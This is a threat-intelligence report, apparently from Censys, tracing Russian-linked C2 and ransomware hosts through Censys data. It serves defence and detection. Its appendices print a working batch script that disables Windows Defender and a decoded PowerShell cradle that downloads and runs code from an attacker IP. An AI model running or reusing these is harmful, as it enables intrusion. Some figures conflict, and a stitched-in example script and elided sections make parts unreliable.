# Russian Ransomware C2 Network Discovered in Censys Data

Prepared on: 18 July 2022

## Table of Contents

- Link Analysis Diagram
- Executive Summary
- Explanation of Findings
- Summary Analysis
- Proactive Hunt Playbook
- Appendices

## Link Analysis Diagram

## Executive Summary

### Overview

On or about 24 June 2022, out of over 4.7 million hosts Censys observed in Russia, Censys discovered two Russian hosts running the exploitation tool Metasploit and the Command and Control (C2) tool Deimos C2. Historical analysis indicated that one of these Russian hosts had also used the tool PoshC2. These tools allow penetration testers and hackers to gain access to and manage target hosts. Censys then used details from the PoshC2 certificate to locate, among hosts elsewhere in the world including the US, two additional Russian hosts also using the PoshC2 certificate. Censys data showed these two Russian hosts possessing confirmed malware packages, one of which included a ransomware kit and a file that pointed to two additional Russian Bitcoin hosts. Additionally, Censys located a host in Ohio also possessing the Deimos C2 tool discovered on the initial Russian host and, leveraging historical analysis, discovered that in October 2021 the Ohio host had possessed a malware package with software similarities to the Russian ransomware hosts possessing PoshC2 mentioned above.

### Assessment

Censys assesses that the initially discovered Russian Hosts A & B, with Metasploit and Deimos C2, are possibly initial attack vectors used to take over victim hosts. Russian Hosts F & G possess malware capable of disabling anti-virus and performing a ransomware attack, with beacons to two Bitcoin nodes that likely receive ransomware payments from victims.

### Methodology

Censys conducts continuous technical Internet scanning on all publicly available IPv4 hosts in the world.
In this investigation, Censys leveraged its own data in the form of software enumeration, certificate documentation, historical evidence, HTTP body responses, and geolocational data to identify and pivot through this network. Censys confirmed the offensive exploit, C2, and malware tools through third-party sources referenced in this report.

## Explanation of Findings

### Metasploit Discovery

On or about 24 June 2022, Censys ran a report to view the top 1000 software products currently observable amongst the over 7.4 million hosts discovered by Censys in Russia. Metasploit, a penetration testing toolkit developed by Rapid7, was observed by Censys on nine of these hosts. Although Metasploit enables users to compromise target hosts, it is used by many legitimate penetration testing teams for cybersecurity purposes, so Censys investigated the hosts' current postures to look for any other indicators of nefarious activity. On one host, 5.101.5[.]196 (Host A), Censys also found the web vulnerability tester Acunetix on port 3443 as well as the Deimos C2 tool on port 8443. Since those additional tools were only found on Host A, Censys decided to investigate further.

### Deimos C2 JARM fingerprint search

Deimos C2 "is a post-exploitation Command & Control (C2) tool that leverages multiple communication methods in order to control machines that have been compromised."[1] This is also a tool used by legitimate cybersecurity penetration testers to manage their operations, and it stands to reason that a host used for such purposes might have Metasploit, Acunetix, and a C2 tool. However, given Host A's country of origin and the presence of the additional tools on only one host, we searched Censys' data via the JARM fingerprint associated with Deimos C2 to determine the prevalence of Deimos C2 worldwide. If Deimos C2 was highly prevalent, then it might be a benign connection.
Instead, Censys found only three other hosts with a matching Deimos C2 JARM fingerprint. The Chinese host (Host C) had a matching JARM fingerprint but did not seem to have any other identifying data points. Russian Host B listed Deimos C2 in the HTML title, as did the original Russian host, and mirrored the same ports, protocols, and software almost exactly. Ohio Host D did not have a similar configuration, but did match the Deimos C2 JARM and the HTML title.

See For Yourself - Run This Query:

```
services.jarm.fingerprint: 1bd1bd1bd0001bd00041d1bd1bd41db0fe6e6bbf8c4edda78e3ec2bfb55687
```

### Host D with Deimos C2

Host D had Deimos C2 running on port 8443 as recently as 06 July 2022. Also notable was that Censys observed "Squid Cache Squid 3.5.27" software on port 31337. Squid "is a caching and forwarding HTTP web proxy."[2] Proxies have legitimate uses, but "[a]dversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure."[3]

[2] https://en.wikipedia.org/wiki/Squid_(software)
[3] https://attack.mitre.org/techniques/T1090/002/

### Original Russian host (Host A)

After locating ransomware executables on Ohio Host D, Censys revisited the original Russian Host A for other indicators of nefarious activity. While conducting a historical analysis of Host A, Censys found that port 31001 had been added on 30 May 2022 and was not recently open. After reviewing the host summary on this date, Censys noticed a certificate on port 433 listing the location as Minnetonka, MN, which seemed anomalous for a Russian host. What is more, the "O" (Organization) listed was "Pajfds" and the "OU" (Organizational Unit) listed was "Jethpro", which seemed suspicious to Censys.
Censys performed a Google search for these certificate details and found the exact same certificate details listed as an Indicator of Compromise (IOC) for the PoshC2 tool on the website of its developer, Nettitude Labs. PoshC2 is a free and open source "proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement." The website also lists an HTTP response as an IOC that mirrors the response Censys obtained from Russian Host A during scanning.

### Fremont Host K with PoshC2

On 21 April 2021, Censys observed Host K with a PoshC2 certificate and a possible malware kit on port 80, with a directory format identical to other PoshC2 hosts with confirmed malware kits, but Censys was unable to link any of the files listed on Host K to any known malware or nefarious activity. Similar to Virginia Host E, however, the Fremont host does also have Python and Apache software installed. Censys is hesitant to suggest this could be a proxy of a C2 network, as Censys found no direct ties to any Russian hosts, either those identified as nefarious in this report or otherwise, except for the presence of the PoshC2 certificate and the similar directory listing format. A possible explanation is that this host is functioning as a legitimate penetration testing tool operated by legitimate security practitioners. Censys is including this host in the report for thoroughness and to allow other researchers to rule out the host as nefarious. A file analysis was not possible as the host has closed this port and Censys' observation of the possible malware kit was historical.

### Other Hosts

- Hosts K through O with only the PoshC2 certificate

See For Yourself - Run This Query:

```
services.tls.certificates.leaf_data.subject_dn=`C=US, ST=Minnesota, L=Minnetonka, O=Pajfds, OU=Jethpro, CN=P18055077`
```

### Russian Host F with PoshC2

Host F was presenting the PoshC2 HTTP response and certificate as recently as 22 June 2022.
Additionally, on port 8000, Censys discovered not only the Python software previously mentioned as required for attackers to implant on targets, but also an HTTP response that includes the malware kit depicted below. This was observed as recently as 07 July 2022. This malware kit allows an attacker to disable a target's antivirus and remotely manage the target; it contains a trojan and callbacks to two other Russian hosts with operational Bitcoin ports, one of which is listed on a Bitcoin node directory. This same host, 92.53.90[.]70, also previously had a Covenant C2 certificate and HTML title on 05 May 2022. A full malware analysis of the kit found on Host F can be found in Appendix A.

[...] of a ransomware C2 network, likely as an attacker or a proxy (a victim is possible; however, Censys' historical analysis indicates the presence, removal, and reemergence of the PoshC2 certificate and the persistence of a malware kit modified over time, which would be more in line with an attacker modifying their attack methods).

(Screenshot caption: Disables Windows Defender & Malwarebytes Anti Spyware)

### Russian Host G with PoshC2

This host was presenting the PoshC2 HTTP response and certificate as recently as 07 July 2022. Censys also observed the same Python software and a similarly formatted malware kit to Russian Host F on port 8000, but the contents of the malware kit were different. Censys malware analysis via VirusTotal indicates this kit included the penetration testing access and C2 tool Cobalt Strike, a callback to itself, the credential theft tool Mimikatz, and WinRAR, which can encrypt files and has been used by ransomware groups to do so, possibly indicating that this host is used for initial access on target hosts. Further confirmation of the existence of PoshC2 can be found via the "PoshC2.bat" file used to execute commands for the tool, as well as "dropper_cs.exe", identified in a package on infosecn1nja's GitHub page.
A full malware analysis of this kit can be found in Appendix B.

Screenshot captions from the Host G kit analysis:

- VirusTotal indicates this is Cobalt Strike.
- File appears to call back to itself: 95.213.145[.]101/adServingData/PROD/TMClient/6/8736/?c. "/adServingData/PROD/TMClient/6/8736" is a documented IOC related to PoshC2.
- Subset of the main.exe code; appears to be Python components. Purpose unknown.
- 7-zipped archive containing Mimikatz with password-protected files.
- Zipped archive containing Mimikatz with non-password-protected files, including passwords.txt (all matching the size of the version above).
- Batch file to execute PoshC2 commands. Includes a URL callback to the same host, a known IOC for PoshC2.

### Hosts E & H with PoshC2

Host E was observed with the PoshC2 certificate and HTTP response as recently as 07 July 2022 on port 443. The same Python software as Hosts F and G, as well as a different malware kit, were observed on the host as recently as 28 June 2022. A direct malware analysis could not be performed since, at the time of Censys' discovery of the host, the port on which the malware package was located, 443, was closed. The kit contained 155 files, several of which were identified as malicious by JoeSandbox and Hybrid Analysis, but no direct links to ransomware were identified. A full file list can be found in Appendix C. Censys ran Google searches for the files included in the kit and found matches to a host, Host H, based in the UK but on the Russian network Selectel, via a Pastebin drop dated 19 July 2021. Censys performed a historical analysis on Host H and confirmed the existence of the malware files at the same time, as well as a PoshC2 certificate on port 443 on 17 September 2021 (this host was not observed during the original PoshC2 certificate search as it had closed port 443 at the time of that search). Censys used JoeSandbox and Hybrid Analysis to confirm the malware and identified ties to ransomware.
A full malware list can be found in Appendix D. This host is currently listed as based in St. Petersburg, Russia, and was identified by @r3dbU7z on Twitter as part of the MedusaLocker group.

Additionally, Apache HTTPD software on port 443 was observed on Virginia Host E as recently as 25 June 2022. According to PoshC2 documentation, an attacker can use Apache software on a proxy host to silently redirect traffic from the target to the C2 server and attacker, without the target host knowing. This would serve to hide the origin of the true attacker. It is possible that the Virginia host was or is functioning as such a proxy within the US so as to be trusted by other US-based potential victim hosts; however, Censys does not possess the data to confirm this.

### Hosts L thru O with PoshC2

Censys observed Hosts L through O each with a PoshC2 certificate, but did not find directories similar to other hosts with confirmed malware kits.

However, Censys did observe Apache software on Hosts L, M and O, which PoshC2 documentation states an attacker can use on a proxy host to silently redirect traffic from the target to a C2 server and attacker without the target host knowing, as previously stated for Host E. This fact is a possible indicator that Hosts L through O are currently, or are intended to be, used as C2 proxies, but this possible indicator alone is not enough to conclude that these hosts are or will function as C2 proxies. It should also be noted that, similar to Host H, Censys observed Host O geographically in the Netherlands, but on the Russian virtual dedicated server provider VDSINA-NL (RU), with known server locations in both Russia and the Netherlands. This fact is merely an additional indicator of possible Russian control/presence on the host.
## Summary Analysis

The discovery of Metasploit on Host A uncovered the tool Deimos C2. A Censys search on the JARM fingerprint of Deimos C2 uncovered Host D with the same tool, but also a web proxy, which can be used to hide the identity of a true attacker, and a piece of malware in October 2021 tied to the Karma ransomware group. Censys' assumption is that, while we are currently unable to tie Host D to any attack, the intent of the host was to levy its ransomware kit against targets.

The fact that both Host D and original Host A had the Deimos C2 tool can be considered coincidental. However, the fact that Host D's malware directory format and Python software mirrored those of MedusaLocker-linked Hosts F and G, and that both of those hosts not only possessed confirmed ransomware but also linked back to Host A via the PoshC2 certificate, could mean that Host D was functioning as a proxy for Host A. However, Censys was unable to observe Deimos C2 on Host A during or before the October 2021 timeframe during which Host D possessed malware. Chinese Host C did have the Deimos C2 JARM during this time period, but no other indicators of Deimos C2 or malware.

Censys assesses that Hosts F and G, however, are confirmed ransomware hosts that are either functioning as original attackers or as C2 servers/nodes, due to the confirmed ransomware on both hosts and Host F's possession of a file that points to Bitcoin Hosts I & J, presumably for ransomware victims to pay the ransom in Bitcoin. The link of Hosts F and G to initial Host A is circumstantial, based only on the existence of the PoshC2 certificate and being hosted in Russia; further analysis with other data types is required to conclude or rule out any direct connection. Hosts E and H share the same circumstantial PoshC2 certificate tie to Host A, but share with each other a similar malware kit.
While Host E's malware kit was not directly tied to ransomware, Host H's was, and the files, while similar, seemed to be modified. Censys suspects these two hosts are/were used as C2 proxies, especially as Host H was previously hosted in the UK but via a Russian network provider and is now listed as based in Russia.

Censys leveraged its own temporal visibility of worldwide hosts to find hosts with cyber exploitation tools and C2 tools, and then pivoted within its own data to uncover hosts related to those tools, possessing proxy software and malware kits. While many connections are circumstantial, Censys is certain that Hosts F and G are fully capable of carrying out ransomware attacks and funnelling Bitcoin payments to Hosts I and J. Censys encourages the rest of the community to investigate other connections mentioned in this report to confirm or deny a wider ransomware network.

## Proactive Hunt Playbook

Step 1. Initial search for all hosts Censys observes geographically located in Russia.

```
location.country=`Russia`
```

Step 6. [...] G, suspicious hosts K, E, and H, as well as Hosts L-O (certificate subject DN query follows).
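The three pivots this playbook and the earlier Deimos C2 JARM search rely on (JARM fingerprint, PoshC2 certificate subject DN, PoshC2 URI IOC), applied offline to constructed host records, as an added example that is not Censys code. The record field names `jarm`, `tls_leaf_subject_dn` and `http_body` are simplifying assumptions rather than Censys' schema, and the IPs are documentation-range placeholders; the DN is parsed rather than string-compared so the match does not depend on the spacing differences visible in the report's own query text.

```python
# Added example, not Censys code; record field names are simplifying assumptions.
from dataclasses import dataclass

# Indicators quoted in the report.
DEIMOS_C2_JARM = "1bd1bd1bd0001bd00041d1bd1bd41db0fe6e6bbf8c4edda78e3ec2bfb55687"
POSHC2_SUBJECT = {
    "C": "US", "ST": "Minnesota", "L": "Minnetonka",
    "O": "Pajfds", "OU": "Jethpro", "CN": "P18055077",
}
POSHC2_URI_IOC = "/adServingData/PROD/TMClient/6/8736"


def parse_subject_dn(dn: str) -> dict[str, str]:
    """Split a comma-separated subject DN into {attribute: value}.

    The report writes the same DN both as "C=US, ST=Minnesota, ..." and as
    "C=US,ST=Minnesota,..."; parsing makes the match independent of spacing.
    """
    attrs: dict[str, str] = {}
    for part in dn.split(","):
        key, sep, value = part.partition("=")
        if sep:
            attrs[key.strip().upper()] = value.strip()
    return attrs


def is_poshc2_subject(dn: str) -> bool:
    """True when every attribute pinned by the playbook query is present with the same value."""
    attrs = parse_subject_dn(dn)
    return all(attrs.get(k) == v for k, v in POSHC2_SUBJECT.items())


@dataclass(frozen=True)
class Finding:
    ip: str
    port: int
    indicator: str  # which pivot fired
    evidence: str   # the matched value, for the analyst's notes


def hunt(hosts: list[dict]) -> list[Finding]:
    """Apply the three pivots to every service on every host record."""
    findings: list[Finding] = []
    for host in hosts:
        for svc in host.get("services", []):
            ip, port = host["ip"], svc["port"]
            if svc.get("jarm") == DEIMOS_C2_JARM:
                findings.append(Finding(ip, port, "deimos_c2_jarm", DEIMOS_C2_JARM))
            dn = svc.get("tls_leaf_subject_dn")
            if dn and is_poshc2_subject(dn):
                findings.append(Finding(ip, port, "poshc2_certificate", dn))
            if POSHC2_URI_IOC in svc.get("http_body", ""):
                findings.append(Finding(ip, port, "poshc2_uri", POSHC2_URI_IOC))
    return findings


def pivot_summary(findings: list[Finding]) -> dict[str, list[str]]:
    """Collapse findings to {ip: sorted indicator names}, so hosts that share
    more than one indicator (the report's strongest links) stand out."""
    by_ip: dict[str, set[str]] = {}
    for f in findings:
        by_ip.setdefault(f.ip, set()).add(f.indicator)
    return {ip: sorted(names) for ip, names in sorted(by_ip.items())}


# Constructed sample records (documentation-range IPs, not the report's hosts).
SAMPLE_HOSTS = [
    {   # Deimos C2 on 8443 plus the PoshC2 certificate: the Host A pattern
        "ip": "192.0.2.10",
        "services": [
            {"port": 8443, "jarm": DEIMOS_C2_JARM},
            {"port": 443, "tls_leaf_subject_dn":
             "C=US, ST=Minnesota, L=Minnetonka, O=Pajfds, OU=Jethpro, CN=P18055077"},
        ],
    },
    {   # Same DN written without spaces, plus the PoshC2 URI in an HTTP body
        "ip": "192.0.2.20",
        "services": [
            {"port": 443,
             "tls_leaf_subject_dn": "C=US,ST=Minnesota,L=Minnetonka,O=Pajfds,OU=Jethpro,CN=P18055077",
             "http_body": "<a href='/adServingData/PROD/TMClient/6/8736/?c'>"},
        ],
    },
    {   # Benign: a Minnetonka certificate from an unrelated organisation
        "ip": "192.0.2.30",
        "services": [
            {"port": 443, "tls_leaf_subject_dn":
             "C=US, ST=Minnesota, L=Minnetonka, O=Example Corp, CN=www.example.com"},
        ],
    },
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_HOSTS):
        print(f"{f.ip}:{f.port}  {f.indicator}  {f.evidence}")
    print(pivot_summary(hunt(SAMPLE_HOSTS)))
```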
Step 6 query:

```
services.tls.certificates.leaf_data.subject_dn=`C=US, ST=Minnesota, L=Minnetonka, O=Pajfds, OU=Jethpro, CN=P18055077`
```

## Appendices

## Appendix A: Malware Analysis on Host F

As seen on Censys.

### def1.bat - MD5: 1393dab192ea2e2427889839a2d8fcf7

Function: disable antivirus (Windows Defender Security Center). VirusTotal analysis.

Contents:

```
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
rem 0 - Disable Logging
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
rem Disable WD Tasks
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
rem Disable WD systray icon
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
rem Remove WD context menu
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
rem Disable WD services
powershell.exe -noprofile -command Add-MpPreference -ExclusionPath "C:\
powershell.exe -noprofile -command Add-MpPreference -ExclusionPath "D:\
powershell.exe -noprofile -command Add-MpPreference -ExclusionPath "E:\
powershell.exe -noprofile -command Add-MpPreference -ExclusionPath "F:\
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender, DisableAntiSpyware and DisableAntiVirus 1 /f
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
```

## Appendix B: Malware Analysis on Host G

As seen on host.

### dropper_cs.exe - MD5: 340c112e41da74f58eb3cf514cd03932

Function: beacon to 95.213.145[.]101/adServingData/PROD/TMClient/6/8736/?c. "/adServingData/PROD/TMClient/6/8736" is a documented IOC related to PoshC2.

VirusTotal: 31 security vendors flagged this file as malicious.

Contents: strings extracted from the .NET assembly.
### MD5: 02f2500b54868acc3b69944f1bf12ae2

As seen on host.

### MD5: 0b3e92b13fcf8d8d65621f92d32cad0e

As seen on host.

Analysis: This upload was the first time VT had seen this file.
Contents appear to be similar to MIMIMI.7z, though without being able to see the password-protected files in !logs from MIMIMI.7z, it is difficult to say whether the contents are entirely the same. The NTLM.txt, Passwords.txt, Result.txt, SHA.txt, and Users.txt files in this archive's !logs directory are the same sizes as the ones in the screenshot from the 7z file above. However, unlike MIMIMI.7z, the files in this archive are not password protected. Screenshots and links to full output are below. Notably, Passwords.txt was empty. NTLM.txt, SHA.txt, Users.txt, and Result.txt can be found here.

### PoshC2.bat - MD5: 96f8a516919536f8f3da32bc5eb58bda

As seen on host.

Function: given the name, it may be the installer for the PoshC2 tool on a victim host. Confirmation is needed.

VirusTotal: 3 security vendors and 1 sandbox flagged this file as malicious.

Contents (subsets below; full .txt files available upon request). Decoding the base64 string reveals the following command:

```
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$MS=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((new-object system.net.webclient).downloadstring('https://95.213.145[.]101/uasclient/0.1.34/modules/_rp')));IEX $MS
```

### MD5: 8a6217d94e1bcbabdd1dfcdcaa83d1b3

As seen on host.

## Appendix C: Malware/Exploit Kit on Host E

Contents: Directory listing for /
[Sharp_v4_Donut_x64_Shellcode.b64](Sharp_v4_Donut_x64_Shellcode.b64) - [Sharp_v4_Donut_x64_Shellcode.bin](Sharp_v4_Donut_x64_Shellcode.bin) - [Sharp_v4_Donut_x86_Shellcode.b64](Sharp_v4_Donut_x86_Shellcode.b64) - [Sharp_v4_Donut_x86_Shellcode.bin](Sharp_v4_Donut_x86_Shellcode.bin) - [Sharp_v4_DotNet2JS.b64](Sharp_v4_DotNet2JS.b64) - [Sharp_v4_DotNet2JS.js](Sharp_v4_DotNet2JS.js) - [Sharp_v4_dropper_migrate_x64.c](Sharp_v4_dropper_migrate_x64.c) - [Sharp v4 dropper migrate x64 exe](Sharp v4 dropper migrate x64 exe) ###### Contents: ( - [ - [ - [ - [ - [ - [ - [ - [ - [Posh_v2_msbuild.xml - [Posh_v2_x64.dll](Posh_v2_x64.dll) - [Posh_v2_x64_Shellcode.b64](Posh_v2_x64_Shellcode.b64) - [Posh_v2_x64_Shellcode.bin](Posh_v2_x64_Shellcode.bin) - [Posh_v2_x86.dll](Posh_v2_x86.dll) - [Posh_v2_x86_Shellcode.b64](Posh_v2_x86_Shellcode.b64) - [Posh_v2_x86_Shellcode.bin](Posh_v2_x86_Shellcode.bin) - [Posh_v4_csc.cs](Posh_v4_csc.cs) - [Posh_v4_Donut_x64_Shellcode.b64 - [Posh_v4_Donut_x64_Shellcode.bin - [Posh_v4_Donut_x86_Shellcode.b64 - [Posh_v4_Donut_x86_Shellcode.bin ----- #### Malware/Exploit Kit on Host E con’t ###### Contents: - [Sharp_v4_dropper_x64.c](Sharp_v4_dropper_x64.c) - [Sharp_v4_dropper_x64.exe](Sharp_v4_dropper_x64.exe) - [Sharp_v4_dropper_x86.c](Sharp_v4_dropper_x86.c) - [Sharp_v4_dropper_x86.exe](Sharp_v4_dropper_x86.exe) - [Sharp_v4_msbuild.xml](Sharp_v4_msbuild.xml) - [Sharp_v4_x64.dll](Sharp_v4_x64.dll) - [Sharp_v4_x64_Shellcode.b64](Sharp_v4_x64_Shellcode.b64) - [Sharp_v4_x64_Shellcode.bin](Sharp_v4_x64_Shellcode.bin) - [Sharp_v4_x86.dll](Sharp_v4_x86.dll) - [Sharp_v4_x86_Shellcode.b64](Sharp_v4_x86_Shellcode.b64) - [Sharp_v4_x86_Shellcode.bin](Sharp_v4_x86_Shellcode.bin) ----- #### Host H - [64RA.exe](64RA.exe) - [aes.py](aes.py) - [cs_sct.xml](cs_sct.xml) - [dropper.cs](dropper.cs) - [dropper_cs.exe](dropper_cs.exe) - [dropper_cs_ps_pbind_v4.exe](dropper_cs_ps_pbind_v4.exe) - [dropper_cs_ps_v2.exe](dropper_cs_ps_v2.exe) - 
[dropper_cs_ps_v4.exe](dropper_cs_ps_v4.exe) - [dropper_jxa.js](dropper_jxa.js) - [DynamicCode.cs](DynamicCode.cs) - [fcomm.cs](fcomm.cs) - [fcomm_cs.exe](fcomm_cs.exe) - [FCommSharp_v4_csc.cs](FCommSharp_v4_csc.cs) - [FCommSharp_v4_Donut_x64_Shellcode.b64](FCommSharp_v4_Donut_x64_Shellcode.b64) - [FCommSharp_v4_Donut_x64_Shellcode.bin](FCommSharp_v4_Donut_x64_Shellcode.bin) - [FCommSharp_v4_Donut_x86_Shellcode.b64](FCommSharp_v4_Donut_x86_Shellcode.b64) - [FCommSharp_v4_Donut_x86_Shellcode.bin](FCommSharp_v4_Donut_x86_Shellcode.bin) - [FCommSharp_v4_DotNet2JS.b64](FCommSharp_v4_DotNet2JS.b64) - [FCommSharp_v4_DotNet2JS.js](FCommSharp_v4_DotNet2JS.js) - [FCommSharp_v4_dropper_migrate_x64.c](FCommSharp_v4_dropper_migrate_x64.c) - [FCommSharp_v4_dropper_migrate_x64.exe](FCommSharp_v4_dropper_migrate_x64.exe) - [FCommSharp_v4_dropper_migrate_x86.c](FCommSharp_v4_dropper_migrate_x86.c) - [FCommSharp_v4_dropper_migrate_x86.exe](FCommSharp_v4_dropper_migrate_x86.exe) - [FCommSharp_v4_dropper_x64.c](FCommSharp_v4_dropper_x64.c) - [FCommSharp_v4_dropper_x64.exe](FCommSharp_v4_dropper_x64.exe) - [FCommSharp_v4_dropper_x86.c](FCommSharp_v4_dropper_x86.c) - [FCommSharp_v4_dropper_x86.exe](FCommSharp_v4_dropper_x86.exe) - [FCommSharp_v4_msbuild.xml](FCommSharp_v4_msbuild.xml) - [FCommSharp_v4_x64.dll](FCommSharp_v4_x64.dll) - [FCommSharp_v4_x64_Shellcode.b64](FCommSharp_v4_x64_Shellcode.b64) - [FCommSharp_v4_x64_Shellcode.bin](FCommSharp_v4_x64_Shellcode.bin) - [FCommSharp_v4_x86.dll](FCommSharp_v4_x86.dll) - [FCommSharp_v4_x86_Shellcode.b64](FCommSharp_v4_x86_Shellcode.b64) - [FCommSharp_v4_x86_Shellcode.bin](FCommSharp_v4_x86_Shellcode.bin) - [Launcher.hta](Launcher.hta) - [macro.txt](macro.txt) - [payload.bat](payload.bat) - [payload.txt](payload.txt) - [pbind.cs](pbind.cs) - [pbind_cs.exe](pbind_cs.exe) - [PBind_v4_csc.cs](PBind_v4_csc.cs) - [PBind_v4_Donut_x64_Shellcode.b64](PBind_v4_Donut_x64_Shellcode.b64) - [PBind v4 Donut x64 Shellcode.bin](PBind v4 Donut x64 
Shellcode.bin) ----- #### Host H con’t - [PBind_v4_dropper_x64.exe](PBind_v4_dropper_x64.exe) - [PBind_v4_dropper_x86.c](PBind_v4_dropper_x86.c) - [PBind_v4_dropper_x86.exe](PBind_v4_dropper_x86.exe) - [PBind_v4_msbuild.xml](PBind_v4_msbuild.xml) - [PBind_v4_x64.dll](PBind_v4_x64.dll) - [PBind_v4_x64_Shellcode.b64](PBind_v4_x64_Shellcode.b64) - [PBind_v4_x64_Shellcode.bin](PBind_v4_x64_Shellcode.bin) - [PBind_v4_x86.dll](PBind_v4_x86.dll) - [PBind_v4_x86_Shellcode.b64](PBind_v4_x86_Shellcode.b64) - [PBind_v4_x86_Shellcode.bin](PBind_v4_x86_Shellcode.bin) - [PBindSharp_v4_csc.cs](PBindSharp_v4_csc.cs) - [PBindSharp_v4_Donut_x64_Shellcode.b64](PBindSharp_v4_Donut_x64_Shellcode.b64) - [PBindSharp_v4_Donut_x64_Shellcode.bin](PBindSharp_v4_Donut_x64_Shellcode.bin) - [PBindSharp_v4_Donut_x86_Shellcode.b64](PBindSharp_v4_Donut_x86_Shellcode.b64) - [PBindSharp_v4_Donut_x86_Shellcode.bin](PBindSharp_v4_Donut_x86_Shellcode.bin) - [PBindSharp_v4_DotNet2JS.b64](PBindSharp_v4_DotNet2JS.b64) - [PBindSharp_v4_DotNet2JS.js](PBindSharp_v4_DotNet2JS.js) - [PBindSharp_v4_dropper_migrate_x64.c](PBindSharp_v4_dropper_migrate_x64.c) - [PBindSharp_v4_dropper_migrate_x64.exe](PBindSharp_v4_dropper_migrate_x64.exe) - [PBindSharp_v4_dropper_migrate_x86.c](PBindSharp_v4_dropper_migrate_x86.c) - [PBindSharp_v4_dropper_migrate_x86.exe](PBindSharp_v4_dropper_migrate_x86.exe) - [PBindSharp_v4_dropper_x64.c](PBindSharp_v4_dropper_x64.c) - [PBindSharp_v4_dropper_x64.exe](PBindSharp_v4_dropper_x64.exe) - [PBindSharp_v4_dropper_x86.c](PBindSharp_v4_dropper_x86.c) - [PBindSharp_v4_dropper_x86.exe](PBindSharp_v4_dropper_x86.exe) - [PBindSharp_v4_msbuild.xml](PBindSharp_v4_msbuild.xml) - [PBindSharp_v4_x64.dll](PBindSharp_v4_x64.dll) - [PBindSharp_v4_x64_Shellcode.b64](PBindSharp_v4_x64_Shellcode.b64) - [PBindSharp_v4_x64_Shellcode.bin](PBindSharp_v4_x64_Shellcode.bin) - [PBindSharp_v4_x86.dll](PBindSharp_v4_x86.dll) - [PBindSharp_v4_x86_Shellcode.b64](PBindSharp_v4_x86_Shellcode.b64) - 
[PBindSharp_v4_x86_Shellcode.bin](PBindSharp_v4_x86_Shellcode.bin) - [Posh_v2_csc.cs](Posh_v2_csc.cs) - [Posh_v2_Donut_x64_Shellcode.b64](Posh_v2_Donut_x64_Shellcode.b64) - [Posh_v2_Donut_x64_Shellcode.bin](Posh_v2_Donut_x64_Shellcode.bin) - [Posh_v2_Donut_x86_Shellcode.b64](Posh_v2_Donut_x86_Shellcode.b64) - [Posh_v2_Donut_x86_Shellcode.bin](Posh_v2_Donut_x86_Shellcode.bin) - [Posh_v2_DotNet2JS.b64](Posh_v2_DotNet2JS.b64) - [Posh_v2_DotNet2JS.js](Posh_v2_DotNet2JS.js) - [Posh_v2_dropper_migrate_x64.c](Posh_v2_dropper_migrate_x64.c) - [Posh_v2_dropper_migrate_x64.exe](Posh_v2_dropper_migrate_x64.exe) - [Posh_v2_dropper_migrate_x86.c](Posh_v2_dropper_migrate_x86.c) - [Posh v2 dropper migrate x86.exe](Posh v2 dropper migrate x86.exe) ----- #### Host H con’t - [Posh_v2_x86_Shellcode.b64](Posh_v2_x86_Shellcode.b64) - [Posh_v2_x86_Shellcode.bin](Posh_v2_x86_Shellcode.bin) - [Posh_v4_csc.cs](Posh_v4_csc.cs) - [Posh_v4_Donut_x64_Shellcode.b64](Posh_v4_Donut_x64_Shellcode.b64) - [Posh_v4_Donut_x64_Shellcode.bin](Posh_v4_Donut_x64_Shellcode.bin) - [Posh_v4_Donut_x86_Shellcode.b64](Posh_v4_Donut_x86_Shellcode.b64) - [Posh_v4_Donut_x86_Shellcode.bin](Posh_v4_Donut_x86_Shellcode.bin) - [Posh_v4_DotNet2JS.b64](Posh_v4_DotNet2JS.b64) - [Posh_v4_DotNet2JS.js](Posh_v4_DotNet2JS.js) - [Posh_v4_dropper_migrate_x64.c](Posh_v4_dropper_migrate_x64.c) - [Posh_v4_dropper_migrate_x64.exe](Posh_v4_dropper_migrate_x64.exe) - [Posh_v4_dropper_migrate_x86.c](Posh_v4_dropper_migrate_x86.c) - [Posh_v4_dropper_migrate_x86.exe](Posh_v4_dropper_migrate_x86.exe) - [Posh_v4_dropper_x64.c](Posh_v4_dropper_x64.c) - [Posh_v4_dropper_x64.exe](Posh_v4_dropper_x64.exe) - [Posh_v4_dropper_x86.c](Posh_v4_dropper_x86.c) - [Posh_v4_dropper_x86.exe](Posh_v4_dropper_x86.exe) - 